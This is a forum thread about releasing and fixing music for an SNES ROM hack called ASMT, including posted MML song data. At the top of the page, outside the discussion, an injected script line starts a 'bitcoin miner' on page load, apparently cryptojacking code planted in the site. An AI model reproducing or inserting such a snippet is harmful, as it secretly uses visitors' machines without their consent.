<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

ASMT SNES Version COMPLETED

wanna make a game, or anything else? seminal bloom!
User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

ASMT SNES Version COMPLETED

Postby Super Maks 64 » 1 year ago

This is an modification of ASMT 1.2 that makes the game compatible with accurate emulators/hardware. I don't own ASMT

This is just ASMT with AddmusicK sound engine installed that should make it not crash on console.
(currently it also slightly changes small aspects of the game)
I would appreciate any help (reporting bugs, suggestions)

Download:Here

Changelog:
-a lot of stuff before releasing the first version
-added the OWMusic.asm patch
-added an alternate version with A2MT's global songs
-fixed the Bonus Game not playing any music
-fixed the Boss Bass to work with the Demo counter
-added tempo immunity to global songs
-inserted all songs obtained from Wyatt
-added a 1up checkpoint to King Charles's Castle
-made so the final level counts as an exit
-ripped the .brr files from the spcs and made samplegroups for waternoise and mm2boss instead of .bnk files
-restarted on a new rom and finished this
-were too lazy to remention everything that was changed cause it's also in the readme
Last edited by Super Maks 64 on 21 Jan 2018, 20:26, edited 11 times in total.

Cobsters
big fat bozo idiot haha
Posts: 5
Joined: 2 years ago
Pronouns: he/him/his
Location: USA
Contact:

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Cobsters » 1 year ago

Is the world three boss fixed too? It usually only worked on ZSNES.

I'll report any bugs. :)

User avatar
raekuul
X&BUTT
Posts: 956
Joined: 9 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: [Unofficial] ASMT SNES Version ALPHA

Postby raekuul » 1 year ago

Does this fix the World 3 boss to not have transfinite health outside of ZSNES?

User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Super Maks 64 » 1 year ago

World 3 boss doesn't work in 1.1 (the version available at SMW Central), but it works in 1.2(the version that you can find in ASMT v2.0 thread in this subforum).
And by the way every missing level music has been temporarily replaced with SMW Overworld theme.

User avatar
SAJewers
hi
Posts: 2756
Joined: 6 years ago
Location: Nova Scotia

Re: [Unofficial] ASMT SNES Version ALPHA

Postby SAJewers » 1 year ago

Are any of the missing songs re-used in A2MT?

Thought I had a copy of the ASMT Base ROM, but I don't, just A2MTs'.
ImageImageImageImage
Image
ImageImageImageImage

User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Super Maks 64 » 1 year ago

Just checked out the spc set for A2MT and it seems that the songs used in over there and further over there (SMW title screen remixes) are the same (except for the third remix used only in further over there). I have one version of ASMT Resources, but it only contains Kil's music.

EDIT: Found the .txt files for A2MT and I was able to insert both songs that play in over there.
Last edited by Super Maks 64 on 24 Jun 2017, 21:20, edited 1 time in total.

User avatar
ParmaJon
Moose in a suit
Posts: 155
Joined: 3 years ago
First name: Jon (a bit too obvious?)
Pronouns: he/him/his
Location: ParmaJon's Pizza Palace

Re: [Unofficial] ASMT SNES Version ALPHA

Postby ParmaJon » 1 year ago

coolio, I'm glad people are going back and fixing some of these older hacks
Go to bed

Image

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Hello, ASMT Reloaded Team, I'm A2MT music guy.
If you use addmusicK, I suggest you insert high quality music, there is no reason to use old ports. In A2MT Resurrection Project, I unwillingly to use old ports because of fricken old addmusic4.05.
Anyway, there are really good quality ports in SMWCentral. Y'know. DKC2, Touhou 6, whatever else...
I wonder how you could use addmusicK on ASMT...
Last edited by Jongseok on 25 Jun 2017, 07:43, edited 1 time in total.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

I tried to find original ASMT OW MML, but all download pages are deleted. But I can find some missing songs mml.

[UPDATE] I Found some songs of mml: ASMT - Title theme, Street Fighter 2 - Cammy, Yoshi's Island - Baby Bowser's Theme, DKC2 - Krook's March, Touhou 6 - Beloved Tomboyish Daughter, Milon's Secret Castle - The Well, Final Fantasy IV - Final Battle, Ninja Gaiden - Basilisk Mine Field, Water Water Everywhere
Last edited by Jongseok on 25 Jun 2017, 08:40, edited 3 times in total.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Super Maks 64 wrote: Just checked out the spc set for A2MT and it seems that the songs used in over there and further over there (SMW title screen remixes) are the same (except for the third remix used only in further over there). I have one version of ASMT Resources, but it only contains Kil's music.

EDIT: Found the .txt files for A2MT and I was able to insert both songs that play in over there.
I can give you all of A2MT MML files.

User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Super Maks 64 » 1 year ago

Using better ports could be nice, but I'm trying to make this as close as possible to the original, I found ports of Street Fighter-Cammy and
Touhou 6-Beloved Tomboyish Daughter, but they were slightly different so I didn't insert them (one song that is slightly different is plokboss, but that's an exception).
This isn't "ASMT Reloaded", but just ASMT Working Music Version/SNES Version. There was an idea of making a 2.0 version of ASMT, but (I think) it has been cancelled.

I would appreciate if you could share the download link/s for the .mml files (oh boy time to learn how to use another format) and I already have all .txt files for A2MT (that's how I got the music for over there).

On a side note I forgot that FF4 Final Battle existed so I haven't yet looked for a correct port of that

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Super Maks 64 wrote: I would appreciate if you could share the download link/s for the .mml files (oh boy time to learn how to use another format) and I already have all .txt files for A2MT (that's how I got the music for over there).
On a side note I forgot that FF4 Final Battle existed so I haven't yet looked for a correct port of that
Oh well... *.mml = *.txt
Yep. MML IS TXT..
I'll share them soon.. Why don't you find some missing songs(txts) like me?
Last edited by Jongseok on 25 Jun 2017, 11:35, edited 1 time in total.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Super Maks 64 wrote: Using better ports could be nice, but I'm trying to make this as close as possible to the original, I found ports of Street Fighter-Cammy and
Touhou 6-Beloved Tomboyish Daughter, but they were slightly different so I didn't insert them (one song that is slightly different is plokboss, but that's an exception).
It's more difficult to find old ports than new ones.
Now old ports are very expensive because of addmusicK. :)

User avatar
raekuul
X&BUTT
Posts: 956
Joined: 9 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: [Unofficial] ASMT SNES Version ALPHA

Postby raekuul » 1 year ago

Could we extract the music from an older version of ASMT and update those?

User avatar
aterraformer
Posts: 319
Joined: 7 years ago
Location: The Astral

Re: [Unofficial] ASMT SNES Version ALPHA

Postby aterraformer » 1 year ago

:D
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.
Image
Image

User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Super Maks 64 » 1 year ago

raekuul wrote: Could we extract the music from an older version of ASMT and update those?
I don't think that can work, there's a reason why the music inserted by older AddMusics doesn't work and even the hack fixme guide doesn't mention anything about taking the music data from the rom and inserting it in another one.


By the way the first post now has an up to date list of missing songs (and also ones that don't work)
Also does anyone know which song plays during the credits?

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Super Maks 64 wrote:
Here are txt o' some missing songs.
Attachments
ASMT.zip
(116.91 KiB) Downloaded 38 times
Last edited by Jongseok on 26 Jun 2017, 11:17, edited 1 time in total.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Yoshi's Island - Underground.. Hmm... How about using just new sampled one? It's totally same..

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

oops. Cammy's stage song's echo is exceeded. So, please change like this.

Code: Select all

#am4
#SPC
{
#game "Super Street Fighter 2"
#title "Cammy"
}

#0	w240 t60

#0	@1	q7F v250 y10;
#1	@4	q7F v140 y10;
#2	@6	q7F v130 y8
#3	@6	q7F v130 y12
#4	@4	q7F v120 y10;
#5	@6	q7F v130 y10
#6	@24	q7F v120 y10;

#0
$EF $03 $00 $00
$F1 $0B $63 $01
$F2 $D8 $28 $28
[r2]16
o4
f2^8<a+8>c+8d+8
f4f+8f4.c+4
d+2d+8.f8.f+8
c+8.a+8.g+8f+8.f8.f+8
f4.f+16f16d+4.<a+8
>c+8.f8.a+8a+8.b8.a+8
g+4.f+4.f4
f4f+8g+4f+8f4
f2^2
[r2]10
a+4a+8g+4g+4c+8
c+4d+8f4c+8d+4
f+8f8d+8c+8c+8d+8f8d+4
d+2d+8c+8d+8
d+8f8f+8>c+4<a+8>c+8c+4
d+8d+2^2^2.
[r2]6



#1
[r2]32
o4
f2^8<a+8>c+8d+8
f4f+8f4.c+4
d+2d+8.f8.f+8
c+8.a+8.g+8f+8.f8.f+8
f4.f+16f16d+4.<a+8
>c+8.f8.a+8a+8.b8^16>c+8
c+4c+8<b4b4a+8
f4f+8g+4f8f+8g+8
a+8g+8f+8f4f+8g+8f4
d+2d+8f8f+8
f+8g+8a+8g+4f+8f8c+4
d+8d+2^2^2.
[r2]6


#2
o4
[a+8.a+8.a+4a+8g+4
a+8.f+8.d+4a+8g+4]2
r8f+16f16r16f+8.f+8.a+8.d+8
r8c+8f8.f16f8.f+8.g+8
r8a+16f+16a+8.<a+16>f8.f+8.a+8
g+8.>c+8.c+8<g+8.>c+8.<g+8
[r8f+8r16f+8.f+16r8f+8r16f+8
r8f8r16f8.f16r8f8r16f8
r8g+8r16g+8.g+16r8g+8r16g+8
r8f+8r16f+8.f+16r8f+8r16f+8]4
r8f+8r16f+16g+8.r4^16a+8
r4a+8r8a+8r16a+8a+16r4
a+8r16a+16>c+8.r4^16c+4
d+8d+2.
r8<a+8r4.>c+8r4.
c+8r4d+8r4<g+8
r4g+8r8>c+4<g+4
a+4.g+2^8


#3
o4
[f+8.f+8.f+4f+8f4
f+8.d+8.<b4>f+8f4]2
r8d+16c+16r16d+8.d+8.f+8.<b8
r8a+8>c+8.c+16c+8.d+8.f8
r8f+16d+16f+8.<f+16>c+8.d+8.d+8
f8.g+8.f8f8.g+8.f8
[r8d+8r16d+8.d+16r8d+8r16d+8
r8c+8r16c+8.c+16r8c+8r16c+8]8
r8d+8r16d+16f8^16r4^16f+8
r4f+8r8f+8r16f+8f+16r4
f+8r16f+16g+8.r4^16g+4
a+8a+2.
r8f+8r4.g+8r4.
a+8r4>c8r4<f8
r4f8r8g+4f4
f+4.f2^8



#4
o3
[d+2.c+4<b2.>c+4]2
<g+2^2
a+2^2
b2^2
>c+4.<b8>c+8.d+8.c+8
d+2^2
[r2]14
d+2^2
<a+2^2
>g+2^2
c+2^2
[r2]8
<b4.>c+2d+4
d+8d+16d+8d+16d+8d+8d+16d+16d+8
d+4.f2f+4
f+8f+16f+8f+16f+8f+8f+16f+16f+8
d+4.g+2f+4
f+8f+8g+4f8f8c+4
c+8c+16c+8c+16c+8c+8c+16c+16c+8
<b4.>c+2^8

#5
o4
[d+8.d+8.d+4d+8c+4
d+8.<b8.f+4>d+8c+4]2
[r2]8
<
[d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8
d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8
d+8b8d+16b8.b16a+16d+16b8d+16b8
d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8]4
<g+8>b8<g+16>b16>c+8.o2a+8.a+16a+16o4d+8
r8o2b8o4d+8o2b8o4d+8o2b16o4d+8d+16o2b8
b8o4d+8o2b16o4d+16f8.<c+8.c+16c+16>f4
f+8f+2.
<d+8>d+8<d+8f4>f8<f8f+4
>f+8<f+8g+8>g+8<g+4>c+8
r8<g+8>c+8<g+8>f4c+4
d+4.c+2^8

#6
o2
[f+4f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+16]1
<b16>f+16f+16a+16d16
*1
d16f+16f+16a+16a16
[f+8a+8]12
f+16<b16>a+16<b16>f+16<b16>a+16<b16>a+8<b16>a+16r8r8
a+8
*14f+16d16a+8f+8
a+16d16*14f+16d16a+8f+8
a+16a16*14f+16d16a+8f+8
a+16d16*14f+16d16a+8f+16d16
a+16d16f+8d16d16a8f+4d8d16d16
[f+8r8<b8>a+8f+8a+8f+16<b16>a+8
f+16d16f+8d16d16a8f+4d8d16d16]2
f+8r8<b8>a+8f+8a+8f+16<b16>a+8
f+8r8f+8a+8f+8a+8f+8a+8
f+8f+8d8d8f+4a+16d16f+16b16

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version ALPHA

Postby Jongseok » 1 year ago

Super Maks 64 wrote:
If someone cannot find overworld songs, it is nearly impossible to get. :) I really wanna download them. BTW, I found more missing songs, but they are different...

User avatar
Super Maks 64
Opinions everywhere, man
Posts: 239
Joined: 1 year ago
Pronouns: he/him/his
Location: Poland

Re: [Unofficial] ASMT SNES Version BETA 0.(0)1

Postby Super Maks 64 » 1 year ago

By the way this was updated.

Changes:
-inserted some missing music
-from the start up to Overgrown Fortress this should play exactly the same as original ASMT (not 100% sure though)
-added 2 newly ripped SPCs from the original that were missing (Pressure Point and Credits music)
-added the full (besides the above mentioned songs) ASMT soundtrack (that I got from somewhere and used to find correct ports) so you can compare the inserted songs to the original ones


I'm thinking about adding an alternate Addmusic_list file that inserts some global songs from A2MT (death, course clear and game over).
Should I?

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version BETA 0.(0)1

Postby Jongseok » 1 year ago

Super Maks 64 wrote: I'm thinking about adding an alternate Addmusic_list file that inserts some global songs from A2MT (death, course clear and game over).
Should I?
Very nice idea. I love A2MT's sfx. It's perfectly okay.

User avatar
raocow
the death of the incredible huge
Posts: 2522
Joined: 9 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: [Unofficial] ASMT SNES Version BETA 0.(0)1

Postby raocow » 1 year ago

I'd agree with that
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version BETA 0.(0)1

Postby Jongseok » 1 year ago

Super Maks 64 wrote:
Eh? I gave you Cammy's theme which is fixed on this topic. Anyway, I upload it again.

Code: Select all

#am4
#SPC
{
#game "Super Street Fighter 2"
#title "Cammy"
}

#0	w240 t60

#0	@1	q7F v250 y10;
#1	@4	q7F v140 y10;
#2	@6	q7F v130 y8
#3	@6	q7F v130 y12
#4	@4	q7F v120 y10;
#5	@6	q7F v130 y10
#6	@24	q7F v120 y10;

#0
$EF $03 $00 $00
$F1 $0B $63 $01
$F2 $D8 $28 $28
[r2]16
o4
f2^8<a+8>c+8d+8
f4f+8f4.c+4
d+2d+8.f8.f+8
c+8.a+8.g+8f+8.f8.f+8
f4.f+16f16d+4.<a+8
>c+8.f8.a+8a+8.b8.a+8
g+4.f+4.f4
f4f+8g+4f+8f4
f2^2
[r2]10
a+4a+8g+4g+4c+8
c+4d+8f4c+8d+4
f+8f8d+8c+8c+8d+8f8d+4
d+2d+8c+8d+8
d+8f8f+8>c+4<a+8>c+8c+4
d+8d+2^2^2.
[r2]6



#1
[r2]32
o4
f2^8<a+8>c+8d+8
f4f+8f4.c+4
d+2d+8.f8.f+8
c+8.a+8.g+8f+8.f8.f+8
f4.f+16f16d+4.<a+8
>c+8.f8.a+8a+8.b8^16>c+8
c+4c+8<b4b4a+8
f4f+8g+4f8f+8g+8
a+8g+8f+8f4f+8g+8f4
d+2d+8f8f+8
f+8g+8a+8g+4f+8f8c+4
d+8d+2^2^2.
[r2]6


#2
o4
[a+8.a+8.a+4a+8g+4
a+8.f+8.d+4a+8g+4]2
r8f+16f16r16f+8.f+8.a+8.d+8
r8c+8f8.f16f8.f+8.g+8
r8a+16f+16a+8.<a+16>f8.f+8.a+8
g+8.>c+8.c+8<g+8.>c+8.<g+8
[r8f+8r16f+8.f+16r8f+8r16f+8
r8f8r16f8.f16r8f8r16f8
r8g+8r16g+8.g+16r8g+8r16g+8
r8f+8r16f+8.f+16r8f+8r16f+8]4
r8f+8r16f+16g+8.r4^16a+8
r4a+8r8a+8r16a+8a+16r4
a+8r16a+16>c+8.r4^16c+4
d+8d+2.
r8<a+8r4.>c+8r4.
c+8r4d+8r4<g+8
r4g+8r8>c+4<g+4
a+4.g+2^8


#3
o4
[f+8.f+8.f+4f+8f4
f+8.d+8.<b4>f+8f4]2
r8d+16c+16r16d+8.d+8.f+8.<b8
r8a+8>c+8.c+16c+8.d+8.f8
r8f+16d+16f+8.<f+16>c+8.d+8.d+8
f8.g+8.f8f8.g+8.f8
[r8d+8r16d+8.d+16r8d+8r16d+8
r8c+8r16c+8.c+16r8c+8r16c+8]8
r8d+8r16d+16f8^16r4^16f+8
r4f+8r8f+8r16f+8f+16r4
f+8r16f+16g+8.r4^16g+4
a+8a+2.
r8f+8r4.g+8r4.
a+8r4>c8r4<f8
r4f8r8g+4f4
f+4.f2^8



#4
o3
[d+2.c+4<b2.>c+4]2
<g+2^2
a+2^2
b2^2
>c+4.<b8>c+8.d+8.c+8
d+2^2
[r2]14
d+2^2
<a+2^2
>g+2^2
c+2^2
[r2]8
<b4.>c+2d+4
d+8d+16d+8d+16d+8d+8d+16d+16d+8
d+4.f2f+4
f+8f+16f+8f+16f+8f+8f+16f+16f+8
d+4.g+2f+4
f+8f+8g+4f8f8c+4
c+8c+16c+8c+16c+8c+8c+16c+16c+8
<b4.>c+2^8

#5
o4
[d+8.d+8.d+4d+8c+4
d+8.<b8.f+4>d+8c+4]2
[r2]8
<
[d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8
d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8
d+8b8d+16b8.b16a+16d+16b8d+16b8
d+8a+8d+16a+8.a+16a+16d+16a+8d+16a+8]4
<g+8>b8<g+16>b16>c+8.o2a+8.a+16a+16o4d+8
r8o2b8o4d+8o2b8o4d+8o2b16o4d+8d+16o2b8
b8o4d+8o2b16o4d+16f8.<c+8.c+16c+16>f4
f+8f+2.
<d+8>d+8<d+8f4>f8<f8f+4
>f+8<f+8g+8>g+8<g+4>c+8
r8<g+8>c+8<g+8>f4c+4
d+4.c+2^8

#6
o2
[f+4f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+8f+16f+16a+16]1
<b16>f+16f+16a+16d16
*1
d16f+16f+16a+16a16
[f+8a+8]12
f+16<b16>a+16<b16>f+16<b16>a+16<b16>a+8<b16>a+16r8r8
a+8
*14f+16d16a+8f+8
a+16d16*14f+16d16a+8f+8
a+16a16*14f+16d16a+8f+8
a+16d16*14f+16d16a+8f+16d16
a+16d16f+8d16d16a8f+4d8d16d16
[f+8r8<b8>a+8f+8a+8f+16<b16>a+8
f+16d16f+8d16d16a8f+4d8d16d16]2
f+8r8<b8>a+8f+8a+8f+16<b16>a+8
f+8r8f+8a+8f+8a+8f+8a+8
f+8f+8d8d8f+4a+16d16f+16b16
This is fixed version (AMK Ver). Don't use AMKGUI
Last edited by Jongseok on 29 Jun 2017, 12:27, edited 1 time in total.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: [Unofficial] ASMT SNES Version BETA 0.(0)1

Postby Jongseok » 1 year ago

Super Maks 64 wrote:
And this is Yoshi's Island - Underground Sampled txt with Sample.
I gave you Krook March txt, didn't I?
Anyway, copy Addmusic_sample groups.txt in zip file.
Last edited by Jongseok on 30 Jun 2017, 14:10, edited 1 time in total.


Return to “project showcase”

Who is online

Users browsing this forum: Google [Bot] and 1 guest